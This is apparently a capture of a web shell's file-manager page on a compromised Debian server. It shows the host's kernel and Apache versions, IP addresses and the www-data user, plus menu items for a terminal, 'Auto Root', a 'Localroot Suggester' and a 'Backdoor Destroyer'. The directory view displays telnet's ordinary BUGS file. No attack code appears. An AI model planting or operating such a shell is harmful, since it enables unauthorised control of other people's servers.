Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
telnet /
Delete
Unzip
Name
Size
Permission
Date
Action
BUGS
876
B
-rw-r--r--
1997-06-09 03:29
README.gz
2.27
KB
-rw-r--r--
2000-07-31 01:53
README.telnet
1.03
KB
-rw-r--r--
2016-11-07 19:06
README.telnet.old.gz
7.68
KB
-rw-r--r--
2016-11-07 19:06
changelog.Debian.gz
5.83
KB
-rw-r--r--
2016-11-07 19:06
changelog.gz
2.71
KB
-rw-r--r--
2000-07-23 05:27
copyright
2.35
KB
-rw-r--r--
2016-11-05 14:51
Save
Rename
telnet: - will apparently sometimes assert in ungetch. I think I've fixed this, so if you still see it let me know. - hangs if you telnet to chargen port and push ^Z (due to bogus protocol negotiation attempts) - binary mode doesn't handle crlf right - should warn if the connection isn't encrypted telnetd: - hangs if you do the following: telnet log in cat >/dev/null type 256 'a's with no CRs *THIS IS A KERNEL BUG* Patch enclosed. - crashes in ncurses if the terminal type is undefined, with some versions of ncurses. - should allow passing random user envs as "TELNET_*" - should set REMOTEHOST to the remote hostname - passes login the -p flag instead of sending envs explicitly - should only use included logout() et al. if real ones aren't available in system libs. - addarg() in sys_term.c does some very questionable casts.